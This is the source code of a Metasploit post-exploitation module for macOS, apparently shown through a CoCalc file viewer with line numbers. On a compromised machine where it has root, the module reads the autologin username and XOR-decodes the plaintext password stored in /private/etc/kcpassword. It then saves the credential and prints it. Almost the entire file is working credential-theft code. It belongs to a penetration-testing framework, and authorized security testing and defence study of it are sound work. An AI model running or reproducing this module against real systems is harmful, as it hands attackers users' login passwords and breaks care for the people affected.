CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::OSX::Priv
9

10
  # extract/verify by by XORing your kcpassword with your password
11
  AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F]
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'OSX Gather Autologin Password as Root',
18
        'Description' => %q{
19
          This module will steal the plaintext password of any user on the machine
20
          with autologin enabled. Root access is required.
21

22
          When a user has autologin enabled (System Preferences -> Accounts), OSX
23
          stores their password with an XOR encoding in /private/etc/kcpassword.
24
        },
25
        'License' => MSF_LICENSE,
26
        'Author' => [ 'joev' ],
27
        'Platform' => [ 'osx' ],
28
        'References' => [
29
          ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html']
30
        ],
31
        'SessionTypes' => [ 'meterpreter', 'shell' ]
32
      )
33
    )
34

35
    register_advanced_options([
36
      OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword'])
37
    ])
38
  end
39

40
  def run
41
    # ensure the user is root (or can read the kcpassword)
42
    unless is_root?
43
      fail_with(Failure::NoAccess, 'Root privileges are required to read kcpassword file')
44
    end
45

46
    # read the autologin account from prefs plist
47
    read_cmd = 'defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username'
48
    autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'")
49

50
    if autouser.present?
51
      print_status "User #{autouser} has autologin enabled, decoding password..."
52
    else
53
      fail_with(Failure::NotVulnerable, 'No users on this machine have autologin enabled')
54
    end
55

56
    # kcpass contains the XOR'd bytes
57
    kcpass = read_file(kcpassword_path)
58
    key = AUTOLOGIN_XOR_KEY
59

60
    # decoding routine, slices into 11 byte chunks and XOR's each chunk
61
    decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc|
62
      kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join
63
    end.join.sub(/\x00.*$/, '')
64

65
    # save in the database
66
    # Don't record a Login, since we don't know what service to tie it to
67
    credential_data = {
68
      workspace_id: myworkspace_id,
69
      origin_type: :session,
70
      session_id: session_db_id,
71
      post_reference_name: refname,
72
      username: autouser,
73
      private_data: decoded,
74
      private_type: :password
75
    }
76

77
    create_credential(credential_data)
78
    print_good "Decoded autologin password: #{autouser}:#{decoded}"
79
  end
80

81
  private
82

83
  def kcpassword_path
84
    datastore['KCPASSWORD_PATH']
85
  end
86

87
  def user
88
    @user ||= cmd_exec('whoami').chomp
89
  end
90
end
91

92